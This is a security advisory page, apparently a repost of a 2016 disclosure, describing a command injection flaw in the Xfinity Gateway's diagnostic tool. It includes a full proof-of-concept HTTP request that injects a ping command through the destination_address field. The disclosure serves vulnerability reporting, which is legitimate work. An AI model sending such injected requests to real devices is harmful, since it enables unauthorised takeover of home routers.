Xfinity Gateway Remote Code Execution

2016.12.04
Credit: Gregory Smiley
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Xfinity Gateway: Remote Code Execution # Date: 12/2/2016 # Exploit Author: Gregory Smiley # Contact: gsx0r.sec@gmail.com # Vendor Homepage: http://xfinity.com # Platform: php The page located at /network_diagnostic_tools.php has a feature called test connectivity, which is carried out through a post request to /actionHandler/ajax_network_diagnostic_tools.php. The parameter destination_address is vulnerable to command injection. PoC: POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1 Host: 10.0.0.1 User-Agent: Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://10.0.0.1/network_diagnostic_tools.php Content-Length: 91 Cookie: PHPSESSID=; auth= DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: keep-alive test_connectivity=true&destination_address=www.comcast.net || ping -c3 attackerip; &count1=4 If you open up wireshark and set ip.dst==attackerip and icmp you will see that the router issues 3 icmp echo requests, proving successful command injection. This can be leveraged to completely compromise the device. This vulnerability is also particularly dangerous because there is no CSRF protections in this application as demonstrated here https://www.exploit-db.com/exploits/40853/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top